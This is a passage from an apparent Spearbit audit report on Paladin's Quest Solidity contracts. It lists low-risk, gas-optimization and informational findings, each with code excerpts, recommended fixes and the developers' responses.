Context: QuestBoard.sol#L235-L242, QuestBoard.sol#L380-L438, QuestBoard.sol#L448-L505, QuestBoard.sol#L515-L574
Description: Several functions use questPeriods[questID][questPeriods[questID].length - 1]. The second index into the questPeriods mapping is questPeriods[questID].length - 1. This expression reverts if questPeriods[questID].length is 0. Looking at the code this is not likely to occur, but it is a valid safety check that covers possible strange edge cases.

function _getRemainingDuration(uint256 questID) internal view returns(uint256) {
    ...
    uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1];
    ...
}
function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }
function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }
function increaseQuestObjective(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }

Recommendation: Add a require to check the length of questPeriods[questID]:

+ require(questPeriods[questID].length > 0, "Array Underflow");
  uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1];

Paladin: Implemented in #8.
Spearbit: Acknowledged.

+5.3.4 Prevent dual entry point tokens
Severity: Low Risk
Context: QuestBoard.sol#L986-L991
Description: Function recoverERC20() in contract QuestBoard.sol only allows the retrieval of non-whitelisted tokens. Recently an issue has been found that circumvents such checks, using so-called dual entry point tokens. See the description here: compound-tusd-integration-issue-retrospective

function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) {
    require(!whitelistedTokens[token], "QuestBoard: Cannot recover whitelisted token");
    IERC20(token).safeTransfer(owner(), amount);
    return true;
}

Recommendation: Make sure dual entry point tokens are not whitelisted in the protocol.
Paladin: It is noted in our methodology to check if an ERC20 can be whitelisted as a reward token in the protocol to avoid this type of issue.
Spearbit: Acknowledged.

+5.3.5 Limit the creation of quests
Severity: Low Risk
Context: QuestBoard.sol#L201-L203, QuestBoard.sol#L276-L369, QuestBoard.sol#L870-L879
Description: The function getQuestIdsForPeriod() could run out of gas if someone creates an enormous amount of quests. See also: what-is-the-array-size-limit-of-a-returned-array.
Note: If this were to happen, the QuestIds can also be retrieved directly from the getter of questsByPeriod().
Note: closeQuestPeriod() has the same problem, but closePartOfQuestPeriod() is a workaround for this.
Requiring a minimal amount of tokens to create a quest can limit the number of quests. The minimum number of tokens to pay is: duration * minObjective * minRewardPerVotePerToken[].
The values of duration and minObjective are at least 1, but minRewardPerVotePerToken[] could be 0, and even if minRewardPerVotePerToken is non-zero but still low, the number of tokens required is negligible when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests.

function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) {
    return questsByPeriod[period]; // could run out of gas
}

function createQuest(...) {
    ...
    require(duration > 0, "QuestBoard: Incorrect duration");
    require(objective >= minObjective, "QuestBoard: Objective too low");
    ...
    require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], "QuestBoard: RewardPerVote too low");
    ...
    vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0
    require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, "QuestBoard: feeAmount incorrect"); // feeAmount can be 0
    ...
    require((vars.rewardPerPeriod * duration) == totalRewardAmount, "QuestBoard: totalRewardAmount incorrect");
    ...
    IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount);
    IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount);
    ...
}

constructor(address _gaugeController, address _chest){
    ...
    minObjective = 1000 * UNIT; // initial value, but can be overwritten
    ...
}

function updateMinObjective(uint256 newMinObjective) external onlyOwner {
    require(newMinObjective > 0, "QuestBoard: Null value"); // perhaps set higher
    minObjective = newMinObjective;
}

function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // no isAlive???
    ...
    minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required
    ...
}

Recommendation: Consider setting (higher) minimal values for minRewardPerVotePerToken[] and minObjective.
Paladin: The parameters for minObjective and minRewardPerVote will be carefully calculated off-chain and can be increased. Fake Quests would be skipped by using closePartOfQuestPeriod().
Spearbit: Acknowledged (solution based on procedures, not technical).

+5.3.6 Non existing states are considered active
Severity: Low Risk
Context: QuestBoard.sol#L750-L815
Description: The closePartOfQuestPeriod() function verifies if the state of periodsByQuest[questIDs[i]][period] is active. However, if the state is checked for a non-existing questIDs[i], or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. As PeriodState.ACTIVE == 0, the state is considered to be active, the require() doesn't trigger and processing continues. Luckily, as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects.

enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0

function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant {
    ...
    for(uint256 i = 0; i < length;){
        ...
        require(
            periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE,
            // doesn't work if questIDs[i] & period are empty
            "QuestBoard: Period already closed"
        );

Recommendation: Don't use a value of 0 as a valid state, for example in the following way:

- enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED }
+ enum PeriodState { ZERO, ACTIVE, CLOSED, DISTRIBUTED }

Note: this also requires setting the ACTIVE state explicitly in the functions createQuest() and increaseQuestDuration(). Alternatively, use periodsByQuest[questIDs[i]][period].periodStart != 0 to verify the struct is filled.
Paladin: Implemented in #10.
Spearbit: Acknowledged.

+5.3.7 Critical changes should use two-step process
Severity: Low Risk
Context: Ownable.sol#L62, QuestBoard#L27, MultiMerkleDistributor#L24 and QuestTreasureChest#L23
Description: The QuestBoard.sol, MultiMerkleDistributor.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelin's Ownable contract, which enables the onlyOwner role to transfer ownership to another address. It's possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is necessary for several methods.
Recommendation: Consider implementing a two-step process where the owner nominates an account and the nominated account needs to call an acceptOwnership() function for the transfer of ownership to fully succeed. This ensures the nominated EOA account is a valid and active account.
Paladin: Implemented in #14.
Spearbit: Acknowledged.

+5.3.8 Prevent accidental call of emergencyUpdatequestPeriod()
Severity: Low Risk
Context: MultiMerkleDistributor.sol#L260-L275, MultiMerkleDistributor.sol#L311-L322
Description: Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isn't push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retrieve all the closed periods.

function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) {
    ...
    questClosedPeriods[questID].push(period);
    ...
    questMerkleRootPerPeriod[questID][period] = merkleRoot;
    ...
}

function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) {
    ... // no push()
    questMerkleRootPerPeriod[questID][period] = merkleRoot;
    ...
}

Recommendation: Make sure that emergencyUpdatequestPeriod() can only be called after updateQuestPeriod() has been called, by adding the following check to emergencyUpdatequestPeriod():

require(questMerkleRootPerPeriod[questID][period] != 0, "MultiMerkle: Not closed yet");

Paladin: Implemented in #4.
Spearbit: Acknowledged.

+5.3.9 Usage of deprecated safeApprove
Severity: Low Risk
Context: QuestTreasureChest.sol#L53
Description: OpenZeppelin's safeApprove implementation is deprecated. Reference. Using this deprecated function can lead to unintended reverts and potential locking of funds. See SafeERC20.safeApprove() Insecure Behaviour.
Recommendation: Consider replacing safeApprove() with safeIncreaseAllowance() or safeDecreaseAllowance() instead, per the OpenZeppelin comment.
Paladin: Implemented in #3.
Spearbit: Acknowledged.
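Note: a minimal sketch of the recommended replacement (assuming a hypothetical approval helper in QuestTreasureChest; the real function at QuestTreasureChest.sol#L53 may differ):

contract QuestTreasureChest ... {
    using SafeERC20 for IERC20;

    // Sketch: adjust the allowance relative to its current value instead of
    // calling the deprecated safeApprove().
    function approveERC20(address token, address spender, uint256 amount) external onlyAllowed {
        uint256 current = IERC20(token).allowance(address(this), spender);
        if (amount > current) {
            IERC20(token).safeIncreaseAllowance(spender, amount - current);
        } else if (amount < current) {
            IERC20(token).safeDecreaseAllowance(spender, current - amount);
        }
    }
}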
+5.3.10 questID on the NewQuest event should be indexed
Severity: Low Risk
Context: File.sol#L129
Description: The NewQuest event currently does not have questID set to indexed, which goes against the pattern set by the other events in the contract, where questID is indexed.
Recommendation: Add indexed to questID on the NewQuest event to align with all other events in the file in which questID is indexed.

  event NewQuest(
-     uint256 questID,
+     uint256 indexed questID,
      address indexed creator,
      address indexed gauge,
      address rewardToken,
      uint48 duration,
      uint256 startPeriod,
      uint256 objectiveVotes,
      uint256 rewardPerVote
  );

Paladin: Implemented in #2.
Spearbit: Acknowledged.

+5.3.11 Add validation checks on addresses
Severity: Low Risk
Context: QuestBoard.sol#L182, MultiMerkleDistributor.sol#L81, MultiMerkleDistributor.sol#L126, MultiMerkleDistributor.sol#L185
Description: Validation checks are missing on addresses passed into the constructor functions. Adding checks on _gaugeController and _chest can prevent costly errors during the deployment of the contract. Also, in the functions claim() and claimQuest() there is no zero check for the account argument.
Recommendation: Consider doing the following: In the constructor of QuestBoard, ensure that _gaugeController and _chest are non-zero addresses and also that they are unique from one another.

  contract QuestBoard is Ownable, ReentrancyGuard {
      constructor(address _gaugeController, address _chest){
+         require(_gaugeController != address(0), "Zero Address");
+         require(_chest != address(0), "Zero Address");
+         require(_gaugeController != _chest, "Duplicate address");
          ...
      }
  }

  contract MultiMerkleDistributor is Ownable {
      constructor(address _questBoard){
+         require(_questBoard != address(0), "Zero Address");
          questBoard = _questBoard;
      }
  }

In the functions claim() and claimQuest() add:

+ require(account != address(0), "Zero Address");

Paladin: Implemented in #1 and #17.
Spearbit: Acknowledged.

5.4 Gas Optimization

+5.4.1 Changing public constant variables to non-public can save gas
Severity: Gas Optimization
Context: QuestBoard.sol#L34, QuestBoard.sol#L36, QuestBoard.sol#L38
Description: Several constants are public and thus have a getter function. It is unlikely for these values to be called from the outside, therefore it is not necessary to make them public.
Recommendation: Make constants that do not need to be accessible from the outside private:

- uint256 public constant WEEK = 604800;
+ uint256 private constant WEEK = 604800;
- uint256 public constant UNIT = 1e18;
+ uint256 private constant UNIT = 1e18;
- uint256 public constant MAX_BPS = 10000;
+ uint256 private constant MAX_BPS = 10000;

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.2 Using uint instead of bool to optimize gas usage
Severity: Gas Optimization
Context: QuestTreasureChest.sol#L27
Description: A bool is more costly than uint256, because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by the bool, and finally write back.

contract BooleanTest {
    mapping(address => bool) approvedManagers;
    // Gas Cost : 44144
    function approveManager(address newManager) external{
        approvedManagers[newManager] = true;
    }

    mapping(address => uint256) approvedManagersWithoutBoolean;
    // Gas Cost : 44069
    function approveManagerWithoutBoolean(address newManager) external{
        approvedManagersWithoutBoolean[newManager] = 1;
    }
}

Recommendation: Consider changing bool definitions to uint256.
Paladin: Acknowledged, but will not make the changes.
Spearbit: Acknowledged (not implemented).

+5.4.3 Optimize && operator usage
Severity: Gas Optimization
Context: QuestBoard.sol#L292, QuestBoard.sol#L297, QuestBoard.sol#L389, QuestBoard.sol#L457
Description: A check using && consumes more gas than using multiple require statements. An example test can be seen below:

// Gas Cost: 22515
function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) public {
    require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, "QuestBoard: Null amount");
}

// Gas Cost: 22477
function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) public {
    require(newRewardPerVote != 0, "QuestBoard: Null amount");
    require(addedRewardAmount != 0, "QuestBoard: Null amount");
    require(feeAmount != 0, "QuestBoard: Null amount");
}

Note: It costs more gas to deploy, but is worth it after X calls. Trade-offs should be considered.
Recommendation: Consider using multiple require statements instead of the && operator.
Paladin: Considering the gas cost diff, the diff of gas for deploy, and the fact that those functions might not be used too many times (mainly to adapt the Quest parameters, but in case the Quest has a small duration, recreating a new one would be easier for users), this change was not implemented.
Spearbit: Acknowledged (not implemented).

+5.4.4 Unnecessary value set to 0
Severity: Gas Optimization
Context: QuestBoard.sol#L713
Description: Since all default values in Solidity are already 0, it is unnecessary to include _questPeriod.rewardAmountDistributed = 0; here, as it should already be 0.
Recommendation: Consider removing _questPeriod.rewardAmountDistributed = 0; and adding a comment that it is already 0.
Paladin: Implemented in #9.
Spearbit: Acknowledged.

+5.4.5 Optimize unsigned integer comparison
Severity: Gas Optimization
Context: QuestBoard.sol#L295, QuestBoard.sol#L390, QuestBoard.sol#L975
Description: The check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than != 0, this is only true without the optimizer enabled and outside a require statement. If the optimizer is enabled at 10k runs and the comparison is in a require statement, != 0 is more gas efficient.
Recommendation: Change the > 0 comparison to != 0.
Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.6 Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod()
Severity: Gas Optimization
Context: QuestBoard.sol#L678-L815
Description: In the functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is needed. Nevertheless, _quest is read-only here, so a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas.

function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant {
    ...
    Quest storage _quest = quests[questsForPeriod[i]];
    ...
    gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest
    ...
    uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest
    ...
    IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest
    ...
}

function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant {
    ...
    Quest storage _quest = quests[questIDs[i]];
    ...
    gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest
    ...
    uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest
    ...
    IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest
    ...
}

Recommendation: Replace storage with memory in the definition of _quest.

- Quest storage _quest = quests[questIDs[i]];
+ Quest memory _quest = quests[questIDs[i]];

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.7 Revert string size optimization
Severity: Gas Optimization
Context: QuestBoard.sol#L303, QuestBoard.sol#L987
Description: Shortening revert strings to fit in 32 bytes will decrease deployment gas and will decrease runtime gas when the revert condition is met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing the memory offset.
Recommendation: Shorten the revert strings to fit in 32 bytes. Alternatively, the code could be modified to use custom errors, introduced in Solidity 0.8.4.
Paladin: Changed from revert strings to Custom Errors in #15.
Spearbit: Acknowledged.

+5.4.8 Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers
Severity: Gas Optimization
Context: QuestBoard.sol#L582-L667
Description: Functions withdrawUnusedRewards() and emergencyWithdraw() use periodsByQuest[questID][_questPeriods[i]] several times. It is possible to set a pointer to this record and use that pointer to read and update values. This will save gas and also make the code more readable.

function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant {
    ...
    if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... }
    ...
    uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount;
    ...
    if(withdrawableForPeriod > 0){
        ...
        periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0;
    }
    ...
}

function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant {
    ...
    if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){
        uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount;
        ...
        if(withdrawableForPeriod > 0){
            ...
            periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0;
        }
    } else {
        ...
        totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod;
        periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0;
    }
    ...
}

Recommendation: Create a pointer, for example qp:

QuestPeriod storage qp = periodsByQuest[questID][_questPeriods[i]];

And replace periodsByQuest[questID][_questPeriods[i]] with qp.
Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.9 Needless to initialize variables with default values
Severity: Gas Optimization
Context: MultiMerkleDistributor.sol#L168, MultiMerkleDistributor.sol#L189, MultiMerkleDistributor.sol#L193, QuestBoard.sol#L224, QuestBoard.sol#L330, QuestBoard.sol#L417, QuestBoard.sol#L491, QuestBoard.sol#L560, QuestBoard.sol#L588, QuestBoard.sol#L592, QuestBoard.sol#L639, QuestBoard.sol#L698, QuestBoard.sol#L765
Description: uint256 variables are initialized to a default value of 0 per the Solidity docs. Setting a variable to its default value is unnecessary.
Recommendation: Remove explicit initialization for default values.
Paladin: Implemented in #7.
Spearbit: Acknowledged.
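Note: for 5.4.8 above, the refactored emergencyWithdraw() loop body could look as follows (a minimal sketch assuming the totalWithdraw accumulator shown earlier; the actual change in #7 may differ):

// Sketch: read and update the QuestPeriod record through a single storage pointer.
QuestPeriod storage qp = periodsByQuest[questID][_questPeriods[i]];
if(qp.currentState != PeriodState.ACTIVE){
    uint256 withdrawableForPeriod = qp.withdrawableAmount;
    if(withdrawableForPeriod > 0){
        totalWithdraw += withdrawableForPeriod;
        qp.withdrawableAmount = 0;
    }
} else {
    totalWithdraw += qp.rewardAmountPerPeriod;
    qp.rewardAmountPerPeriod = 0;
}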
+5.4.10 Optimize the calculation of the currentPeriod
Severity: Gas Optimization
Context: QuestBoard.sol#L251-L255
Description: The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten, although this does not happen in the current code.

function updatePeriod() public {
    if (block.timestamp >= currentPeriod + WEEK) {
        currentPeriod = (block.timestamp / WEEK) * WEEK;
    }
}

Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated: "This currentPeriod is a timestamp, showing the start date of the current period, and based on the Curve system (because we want the same timestamp they have in the GaugeController)."
Recommendation: Remove updatePeriod() and replace the use of currentPeriod with a call to a function like getPeriod():

function getPeriod() public view returns(uint256) {
    return (block.timestamp / WEEK) * WEEK;
}

Paladin: Implemented in #16.
Spearbit: Acknowledged.

+5.4.11 Change memory to calldata
Severity: Gas Optimization
Context: MerkleProof.sol#L22, MerkleProof.sol#L38
Description: For function parameters, it is often more optimal for the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. See the OpenZeppelin Pull Request.
Recommendation: Change the memory definition to calldata in the related code section.
Paladin: We decided not to change the OZ dependencies used in this project. However, if the PR linked in this issue is correctly tested, approved and merged before the release of Quest, an update (with the correct tests and checks) of the MerkleProof.sol dependency could be done.
Spearbit: Acknowledged.

+5.4.12 Caching array length at the beginning of function can save gas
Severity: Gas Optimization
Context: MultiMerkleDistributor.sol#L167, MultiMerkleDistributor.sol#L192, QuestBoard.sol#L764, QuestBoard.sol#L857, QuestBoard.sol#L890
Description: Caching the array length at the beginning of the function can save gas in several locations.

function multiClaim(address account, ClaimParams[] calldata claims) external {
    require(claims.length != 0, "MultiMerkle: empty parameters");
    uint256 length = claims.length; // if this is done before the require, the require can use "length"
    ...
}

Recommendation: Consider introducing the length caching (e.g. uint256 length = newToken.length;) as the first line; the require() can then use length.
Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.13 Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily
Severity: Gas Optimization
Context: QuestTreasureChest.sol#L63-L65
Description: A check should be added to make sure amount is greater than 0, to avoid calling safeTransfer() unnecessarily.
Recommendation:

  function transferERC20(address token, address recipient, uint256 amount) external onlyAllowed nonReentrant {
+     require(amount > 0, "Amount cannot be 0");
      ...
  }

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.14 Unchecked{++i} is more efficient than i++
Severity: Gas Optimization
Context: QuestBoard.sol#L224, QuestBoard.sol#L316
Description: The function getAllQuestPeriodsForQuestId uses i++, which costs more gas than ++i, especially in a loop.
Also, the createQuest function uses nextID += 1, which costs more gas than ++nextID. Finally, the initialization of i = 0 can be skipped, as 0 is the default value.
Recommendation: Use ++i instead of i++ to increment the value of a uint variable. Use unchecked where possible. Skip initialization to 0. Note: the unchecked pattern has been used elsewhere in the code too.

function getAllQuestPeriodsForQuestId(uint256 questId) external view returns(QuestPeriod[] memory) {
    ...
-   for(uint256 i = 0; i < nbPeriods; i++){
+   for(uint256 i; i < nbPeriods;){
        periods[i] = periodsByQuest[questId][questPeriods[questId][i]];
+       unchecked{ ++i; }
    }
    return periods;
}

function createQuest(...) ... {
    ...
    uint256 newQuestID = nextID;
-   nextID += 1;
+   unchecked{ ++nextID; }
    ...
}

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.15 Could replace claims[i].questID with questID
Severity: Gas Optimization
Context: MultiMerkleDistributor.sol#L194-L195
Description: claims[i].questID could be replaced with questID (as they are equal due to the check above).
Recommendation: Consider changing the code in the following way:

- require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, "MultiMerkle: not updated yet");
+ require(questMerkleRootPerPeriod[questID][claims[i].period] != 0, "MultiMerkle: not updated yet");

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.16 Change function visibility from public to external
Severity: Gas Optimization
Context: QuestBoard.sol#L898
Description: The function updateRewardToken of the QuestBoard contract could be made external to save gas and improve code quality.
Recommendation: Consider changing the function in the following way:

- function updateRewardToken(address newToken, uint256 newMinRewardPerVote) public onlyAllowed
+ function updateRewardToken(address newToken, uint256 newMinRewardPerVote) external onlyAllowed

Paladin: Implemented in #7.
Spearbit: Acknowledged.

+5.4.17 Functions isClaimed() and _setClaimed() can be optimized
Severity: Gas Optimization
Context: MultiMerkleDistributor.sol#L95-L113
Description: The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration.
Recommendation: Consider changing the functions in the following way:

  function isClaimed(uint256 questID, uint256 period, uint256 index) public view returns (bool) {
-     uint256 claimedWordIndex = index / 256;
-     uint256 claimedBitIndex = index % 256;
+     uint256 claimedWordIndex = index >> 8;
+     uint256 claimedBitIndex = index & 0xff;
      uint256 claimedWord = questPeriodClaimedBitMap[questID][period][claimedWordIndex];
      uint256 mask = (1 << claimedBitIndex);
-     return claimedWord & mask == mask;
+     return claimedWord & mask != 0;
  }

  function _setClaimed(uint256 questID, uint256 period, uint256 index) private {
-     uint256 claimedWordIndex = index / 256;
-     uint256 claimedBitIndex = index % 256;
+     uint256 claimedWordIndex = index >> 8;
+     uint256 claimedBitIndex = index & 0xff;
-     questPeriodClaimedBitMap[questID][period][claimedWordIndex] = questPeriodClaimedBitMap[questID][period][claimedWordIndex] | (1 << claimedBitIndex);
+     questPeriodClaimedBitMap[questID][period][claimedWordIndex] |= (1 << claimedBitIndex);
  }

Paladin: Implemented in #7.
Spearbit: Acknowledged.
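Note: the bit operations above rely on the identities x / 256 == x >> 8 and x % 256 == x & 0xff for unsigned integers. A quick sanity check (a hypothetical standalone snippet, not from the report):

function checkBitIdentities(uint256 index) public pure returns (bool) {
    bool sameWord = (index / 256) == (index >> 8);   // division by a power of two equals a right shift
    bool sameBit = (index % 256) == (index & 0xff);  // modulo by a power of two equals a bit mask
    return sameWord && sameBit;
}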
5.5 Informational

+5.5.1 Missing events for owner only functions
Severity: Informational
Context: QuestBoard.sol#L914, QuestBoard.sol#L924, QuestBoard.sol#L934, QuestBoard.sol#L944, QuestBoard.sol#L954, QuestBoard.sol#L964, QuestBoard.sol#L974
Description: Several key actions are defined without event declarations. Owner-only functions that change critical parameters should emit events to record these changes on-chain for off-chain monitors/tools/interfaces.
Recommendation: Add events to all owner functions that change critical parameters.
Paladin: Implemented in #6.
Spearbit: Acknowledged.

+5.5.2 Use nonReentrant modifier in a consistent way
Severity: Informational
Context: MultiMerkleDistributor.sol#L126-L144, MultiMerkleDistributor.sol#L185-L216, MultiMerkleDistributor.sol#L296-L300
Description: The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but don't have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks-and-effects pattern is used, this is not really necessary.

function claim(...) public {
    ...
    IERC20(rewardToken).safeTransfer(account, amount);
}

function claimQuest(...) external {
    ...
    IERC20(rewardToken).safeTransfer(account, totalClaimAmount);
}

function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) {
    IERC20(token).safeTransfer(owner(), amount);
    return true;
}

Recommendation: Consider adding a nonReentrant modifier to claim(), claimQuest() and recoverERC20() to be more consistent with the rest of the code.
Paladin: Implemented in #6.
Spearbit: Acknowledged.

+5.5.3 Place struct definition at the beginning of the contract
Severity: Informational
Context: QuestBoard.sol#L258, MultiMerkleDistributor.sol#L148
Description: Per the Solidity Style Guide, the struct definitions can be moved to the beginning of the contract.
Recommendation: Consider moving the struct definitions to the beginning of the contract.
Paladin: For CreateVars, as this struct is only used inside the createQuest method (to avoid the StackTooDeep error), the choice was made to put that struct here for faster understanding. And for ClaimParams, as it is used as a parameter for the next methods, the choice to place the struct here was also made for better clarity in the variables layout.
Spearbit: Acknowledged.

+5.5.4 Improve checks for past quests in increaseQuestReward() and increaseQuestObjective()
Severity: Informational
Context: QuestBoard.sol#L448-L574, QuestBoard.sol#L235-L242
Description: The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily, execution is stopped at _getRemainingDuration(questID); however, it would be more logical to put this check near the start of the function.

function increaseQuestReward(...) ... {
    updatePeriod();
    ...
    require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, "QuestBoard: New reward must be higher");
    ...
    uint256 remainingDuration = _getRemainingDuration(questID);
    require(remainingDuration > 0, "QuestBoard: no more incoming QuestPeriods");
    ...
}

The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. This is not what you would expect from this function.
function _getRemainingDuration(uint256 questID) internal view returns(uint256) {
    uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1];
    return (lastPeriod - currentPeriod) / WEEK; // can revert
}

Recommendation: In both the functions increaseQuestReward() and increaseQuestObjective(), move the _getRemainingDuration() check towards the beginning of the function. Adapt _getRemainingDuration() to return 0 if the quest is in the past (see the sketch after 5.5.7 below), or add a comment if the revert is the preferred action.
Paladin: Implemented in #8.
Spearbit: Acknowledged.

+5.5.5 Should make use of token.balanceOf(address(this)) to recover tokens
Severity: Informational
Context: MultiMerkleDistributor.sol#L296
Description: Currently, when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contract's balance of token beforehand. This requires an extra step and can easily be done inside the function itself.
Recommendation: Consider using token.balanceOf(address(this)) to obtain the amount of the token to be transferred. Then the amount will not need to be passed in manually as an argument. A check should be added that the amount to transfer is larger than 0 as well.

- function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) {
+ function recoverERC20(address token) external onlyOwner returns(bool) {
+     uint256 amount = IERC20(token).balanceOf(address(this));
+     require(amount > 0, "Amount cannot be zero");
      IERC20(token).safeTransfer(owner(), amount);
      return true;
  }

Paladin: Implemented in #6.
Spearbit: Acknowledged.

+5.5.6 Floating pragma is set
Severity: Informational
Context: All Contracts.
Description: The current pragma Solidity directive is ^0.8.10. It is recommended to specify a fixed compiler version to ensure that the bytecode produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs.
Recommendation: Lock the compiler to a specific version.

pragma solidity 0.8.10;

Paladin: Implemented in #6.
Spearbit: Acknowledged.

+5.5.7 Deflationary reward tokens are not handled uniformly across the protocol
Severity: Informational
Context: QuestBoard.sol#L307, QuestBoard.sol#L403, QuestBoard.sol#L478, QuestBoard.sol#L546
Description: The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.
Recommendation: Consider checking that the balance before the transfer plus the amount equals the balance after the transfer, for any rebasing/inflation/deflation reward tokens.

+ uint256 oldBalance = IERC20(rewardToken).balanceOf(address(this));
  IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount);
+ uint256 newBalance = IERC20(rewardToken).balanceOf(address(this));
+ require(oldBalance + totalRewardAmount == newBalance, "Fee-on-transfer Tokens Not Supported");

Paladin: Since we have a whitelist for tokens that can be used for Quest rewards, this safeguard should act to prevent rebasing/inflation/deflation types of token (by possibly having to wrap them to be used for the rewards).
Spearbit: Acknowledged (solution based on procedures, not technical).
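Note: the _getRemainingDuration() adaptation suggested in 5.5.4 could be sketched as follows (a minimal sketch; the actual change in #8 may differ):

function _getRemainingDuration(uint256 questID) internal view returns(uint256) {
    uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1];
    // Sketch: return 0 instead of reverting when the quest is already over.
    if(currentPeriod > lastPeriod) return 0;
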